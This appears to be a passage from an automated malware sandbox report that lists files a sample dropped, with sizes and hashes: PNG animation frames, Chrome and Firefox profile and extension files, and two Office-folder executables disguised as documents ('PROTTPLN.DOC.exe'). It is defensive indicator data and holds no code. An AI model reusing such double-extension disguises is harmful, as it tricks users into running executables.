                                                                                                                                                                                                                                                                                                                      6f530b0a64361ef7e2ce6c28cb44b869

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      ca087fc6ed5440180c7240c74988c99e4603ce35

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      457626948266abd4f0dcda6a09c448bb20cce3596b52076b8d90e1c626037dc9

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      dc3d809eab3bfa7c65c35a36d55097e09fbefa2f6de962ae02c58540f6c88b3ca9be3361f3ec37b8ce7927e020463055c455f2e93baa3a3c12096b55abcab6d3

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.007.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      aac6fc45cfb83a6279e7184bcd4105d6

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      b51ab2470a1eedad86cc3d93152360d72cb87549

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      a59bb83276f003dd149c2143a5a70f012212c709e72af283209adfb85a0835b1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      7020ba8d918398bc2d5e6ea4aaea007d576d4c3577adab80259336505b06e8163d0afde5a7b4d802ba2dab9ec9c757e88eb37780246c35d38e5fed8648bbf3a1

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.008.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      fa73c710edc1f91ecacba2d8016c780c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      19fafe993ee8db2e90e81dbb92e00eb395f232b9

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      cca9c6b8e0df9e09523ab59021ffff62b29273cae487335c87b569e8483aaae2

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      f73b2ee270348247db1d7fea937cd69125afa6aef926dc5c1cef14b955630711fe106d56270172448d739014ae4fd7d221007aaa422b3625aa524b812baa10a2

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.009.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3faefb490e3745520c08e7aa5cc0a693

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      357ffa8b2d4797d8d6cf67c0c84818ebc746ce0a

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      6ba5254c0b10b6939d5cd80f3ab87757143896d20fd8e014c3fcca35657e076b

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      714d9d32ab070a992d84dc597a086afb7fe040300c33c25f9acdd27f5f8894145a5f9f8654b522c04a9cb1babeb25000fac25b01b1c820d4cfe8d67e40cd72a7

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.010.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      1bed8b0629ce72b595017371336ac688

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      9180c6c3d0bdd3470fa38854de8af238bcc31d42

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      a8cc3da0e5b87f10e6acd766bbd096dbe40ca60507867ec8ea66c56436fa6cd7

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      4483b0ac1e83ef94f982aa7cf92767a24165060e1d492a87290a2301bcd2654e1c2e5d5cd637151408cac576d74d529b7d05e7e12b27e02afd17e24029a92ceb

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.011.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      c9eccb5ce7e65fd1eff7aba4a6fd43e8

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      cd71011e1172a157627e1595cc7ce4888370a765

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      a4045f846f5b3bb0856dbfdca78b5871433beefccb1416a2824e8dccce9f5975

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      3b07f14cbc06f2a4a75067e09c04c760af324ebe2de5c51c88648b184337aad48d319c2753bc9987ebb2094719d92a0f87d7c0fd84c4d893dd8351e7dc6de3f8

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.012.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      a3bcbf505d81879716178ea1afd3a241

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      47125ba19ff6f074ec8af4b6a21d4ce5067a2909

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      f8677c74b7aa84bb8cf9857d8714ed24cbc171874e507bc93674e4cd2bbcca22

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      2280a522ad0dc4122b55f1ffba90c1a410b225e987512eddfd1aae70012cfef896fa0804048b3147a043a4569aaeea74f658f0f16c2f45c4297644de90710e29

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.013.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      02b9523345fc843b1ce756bcd0290aaf

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      3c39dbe3409d4eed12bfaeea4785ebd2e2bce22b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      20e7c6c4dc2b2f751b2df24784ce1d37c193ff0e6dded55855630bb26df23130

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5691fc2ecd00660d36e53aa17fa6a72285ba97f9ce1d4bfa00ae6b9ab66c5e35c084a9236c02fd4fae51e7fa064e34bd259c3fbb581ed768f110cb122dc3becb

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.014.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      28a55f46abaaf5be52125dbd818a316e

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      3991669f716d5b662c867f47d0e25e45df935801

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      d143345b20fe079f75797ce712374c25ff02157de38a21bad164d8be1858347b

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      0865d49fba58f2abac0edf3abf23d13d2f2cf645edc8198505f089a336e17256ca14fe73e3f561e125d166b091298517f5ff46b865fa001455ab7414a43dc3f1

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.015.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      cda2513580858b22a8b32fb074941bb6

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      437e54479fa0dceabbaf53b13a82347da70024f0

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      9ced59a0ae08603ab736e0d327e7be804baa78325525fb32d60702228d85b166

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      f182ac7787ea39e67f55f512ff37ceaddf28e494875be6a17db07e8d1f6d4de12357462d22c589d76bca485d4ea0bfe6441b031cdce82fbd3495aaa5abd20561

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.001.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      136be0b759f73a00e2d324a3073f63b7

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      b3f03f663c8757ba7152f95549495e4914dc75db

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      c9b925e1f1409ddaa3aadf1ae7c2fb3310b69fb931190b7dc2f274f517fe38fc

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      263911753deffbce295dda3f311225edeb375555b1db2771477167600573bea78719f6294960dc5c5d95885194412dd0f133bae75a30e16556377263165b3723

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.002.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f8f8ea9dd52781d7fa6610484aff1950

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      973f8c25b7b5e382820ce479668eac30ed2f5707

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      209e9d1fb6a814edfa4f8128d4a2168b274ea0eeb965a57f3c8b9695417a1bf1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      4f4e379afff8850eec6e4f3d165eba60f6916569ee7561b8bbf5a6bfeda27dbbcc0687ce02bece412616204f89861d23a92055a226cea14a29c53c653919c094

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.003.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      fb73acc1924324ca53e815a46765be0b

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      62c0a21b74e7b72a064e4faf1f8799ed37466a19

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      5488954fe5b4d87dee40dd68cc1d940d2395a52dc52d1c77f40cd2342b97efd8

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      ea3ba299ca07850af45a29e2f88aece9163c13f4921a1fc05d930c008bc017b698c9fb987120147465a53fe0c0848926f543081716d5f877efa5a34b10822895

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.004.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      6da7cf42c4bc126f50027c312ef9109a

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      8b31ab8b7b01074257ec50eb4bc0b89259e63a31

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2ebdf7d755b442de775819b0bcfe7bdd06fda92f6ad36dcfdeaab107f58f23df

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5c9783a8c14c6654db2a9a7818d4376fc3b2aeab9820539d20353018d90f734652ebba8052184b62f0e17f8f094da28c2bdfc73a0c707036fb5f923ed25625d9

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.005.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      d9d3c74ac593d5598c3b3bceb2f25b1d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      df14dee30599d5d6d67a34d397b993494e66700e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2cba290a8c42f664a0e1a8e571e27bc846024fa7da9f7adc773a471ef74046bc

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      de70858da11efb89e7db55762827f8c1d4b55aff14faea8ffd8a5f15d32d6956f6ca4a3fdd9ffd75906a818af81ba9c7ef056df7c8cec4076308df94ff3207ac

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.006.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3071c94f1209b190ec26913a36f30659

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      d76fbfbc4ddd17383b6a716f24d137a8dc7ff610

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      89868008f5e5c55e5dd5982c15f105d11b9d3603ab45395dde0ec1c5ce61e683

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      bd21f269dd92ab826caa6085bf79f17b6c9b6c4b660d03913295611bae590f277a9a0a0e39fa281737fcd9cfbbb6a5c8f02287d316954badca394e730bad72f4

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_1Idle\_1Idle.003.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      533bc8e9ad951ba6d05c35a829e89156

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      2709a1e51dcfa820a064ee3f0f34dea9cbc4fdee

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      0827a66c31995a144229ca6b9bee27de94fd5bba937d25efde961dfa544d5c91

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d1d31f38686caacbe9453cc92c0bb88c4b085903b7b8eb455241839bec6b5ec4de0a0747cdfbcccb7468bb3bc6ca654e34a748762bb1a71e8e4b90285d397201

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_6Idle\_6Idle.001.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      b00706960382815918c8ed9c2620be98

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      687d41d0499a5b0f21f0c2480a305e4267775854

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      00a8d4f366bb71d1d23e2bf08935e3321ea4552bf68b0e0eda475fa84bd5b1f4

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      651944e3e7e560779810a6d7585da050b9e51c1e50c1a7aebfdda8a6f383e5f05b3304a53ae25a658cfbbae62d6cfb4f7b26166d50ed0227af71a9a7ae2d0947

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_6Idle\_6Idle.002.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      8143b3677c940c9a17cead5fc9152f7c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      f1ebe57d71a4af6a4909ebb239bbd131b5ec3577

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      abe8caa8da0099dcc024a1993a117a7f73c66c6650df3c1430f09d7be19d27c0

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      c0f7df7945e2626d164db1bbf11ad71a58462a5579716f43736475435a5da076f2cd868c85d6b587df4576b3d4aa9dcde4e53295589e0a554a349661f43fac7e

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_6Idle\_6Idle.003.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f47b094e938bc3c67945d1a3591059f7

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      7a4a9e7ff8344f6ea121c134b306c580bf8764f1

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      f3e11eb38d48ab6572b68ed6dd387f081210bf49daee13653fb619f1af27a03e

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      c22376cdf0fa47d7c9aab9c358b888d67d46fc84e3d479bf931d3d5b702881f19671ec562f7e6c5525e25e5bd8470c9a1dd55a671b9f96afe18de298188bbc12

                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      512KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      ba854ac4b94339df71d8c44263a63562

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      16ee69da79d9b6d54baa91937e883d612e088b12

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2f72bdae8574ff648089915c11e85fa1e18224e705152030ec49a5ce56c440b6

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d5c8415c3c0729c117c2dd2bada91c40f7d525019f94eccde70e431945e788fe6817bfc39f4e74d9392f578652f9425c6a367e3448de0f2061dc4ffee92848c3

                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      512KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      781d13fca581b24f594f7693af9329f7

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      9f2aa049bdfa68f2a1e3c78893bda7f9a37b1271

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      abcf7d691de80d629d80979da001ec75cc8b8d40d16526693ea7a82b744f1c0e

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      607bb193bccc43631560e29acc7c5c9a9fe89f114924fea41397d5b1cbd831f414ed51d315cc7b67300be1166ae9b15bf529b22e79c7b8d2adc4c798ed4e5376

                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      571ed2151b5b06ec5578130143cf0b23

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      99c0a6f092a09507144338fc86a9d8da374cbdf8

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2caab984cc8594807d4f6847e04714af8c345f32f2abbbe4ba17e37d13340fa5

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5deff14e87d2e3397af8259aac93915906fccf161f323dd1d0daa3eb948750e5a676cd92bfe13e63fd963bd596b076da905c93d361399d8c9de19aadfb288c8f

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3e0364d2fbb5eb79a7d62129ae9bd447

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      1617df525107baecba01be112dd3984ac933b2d5

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      820fcdb865dfaaf22acf10e2b9dcadd03e11ffbddb5d6d76ce20f729cc268990

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      24154e4595bedb6170d8b1130a358a3ec179d61bff27f45e724c365f0324459368db5cf862af8b26b613a2a9c6d11cc622b3098a92b04430ff8b7ae860713103

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      7KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      d45d57fac719e72b073937b73106acbe

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      f1e630469be623afe022a121b4caf73252e79b0d

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      33eaa82e218a70e28e19874b3da2599388e5347d904583823bb051c42bc6856d

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      22d195faa7a6b938ff0db06ae4b9f93d6e635a6412602689cd03d5ef1d089ffa7b649a42276f9ef7bd4d33674e4aa2987ce0c8fd564b81e834736259f3296ceb

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      22KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      853e4c252b60645dbc6f8c32bb647857

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      49da0574742187365aef204d8004a864186c5c9c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2403407c1fe263b70e968032ffff1a1585ec690e64413cabfdb958266f1e3859

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      43df6251cb072bfc42445dc12f4bf3b8cc2b811c14af6fb8c6cd891fb14ef50d916f467f5d53d4b468154257a9094bb4bdee34c7d7270cb88226b10b5fd2e4bc

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      61eff3993c21a6177f19bcfee186ceef

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4ecdc8536ac164a385903a52273bf63ce902687e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      1863f00b7af0ddabf329c1c19efb877c2d764caaf16994434d7083f3d9ede2ab

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d1cb2e2935b36ff7a74a755317a92ce9a6263436382690c6bf27c2ce03af555c6c15b45295f3f9d4318ec375c8b17ed8d4c73699d79c5726b867cd796e0f529e

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      257KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      6bb37410e31881343655e51708666357

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      2af0b5dc0db4400a70756e20a989315d6162eb57

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      8afd414e70f1aaa8168cea97c7c754313e0e26010493a07d6b4998af829b33e0

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      8c0468ac385d70c54cbf3e4b5b468c7f05a9e4e1d0c91169ef0f5032110cd50b29cee511970e1306fc869ee49a596d4442f504391f6a96d26796d3a90c0aef50

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      262KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      4af3c2b1c7688f00d41947d7e3f1f70d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      d760a2b969fbcd93d67534909b74fa1df6024c29

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      b19f15889787f56367ff89ec37e1d01ad9eb0544bbb4bd5c4224efd0bf669479

                                                                                                                                                                                                                                                                                                                      SHA512

